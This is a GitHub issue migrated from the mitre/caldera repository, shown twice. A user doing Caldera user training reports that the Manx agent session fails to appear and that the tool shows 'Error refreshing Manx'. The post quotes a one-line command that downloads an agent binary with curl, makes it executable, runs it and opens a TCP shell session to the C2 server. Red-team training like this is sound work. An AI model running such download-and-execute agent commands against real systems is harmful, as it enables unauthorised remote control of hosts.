Hi,
When I was doing the user training in caldera, I faced issue while trying the manx related flag.
After pasting the manx sh tcp command in the calder server, I can see the agent entry under agents tab but unable to see the host under session also getting error "Error refreshing Manx"
Manx Command:
server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > super_scary;chmod +x super_scary;./super_scary -http $server -socket $socket -contact $contact -v



Migrated from mitre/caldera#3072
Hi,
When I was doing the user training in caldera, I faced issue while trying the manx related flag.
After pasting the manx sh tcp command in the calder server, I can see the agent entry under agents tab but unable to see the host under session also getting error "Error refreshing Manx"
Manx Command:
server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > super_scary;chmod +x super_scary;./super_scary -http $server -socket $socket -contact $contact -v
Migrated from mitre/caldera#3072